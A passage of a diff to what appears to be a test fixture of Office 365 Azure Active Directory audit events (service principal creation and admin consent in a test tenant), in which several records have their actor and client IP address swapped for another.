",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12718,9 +12718,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -12954,7 +12954,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -12984,9 +12984,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -13220,7 +13220,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to 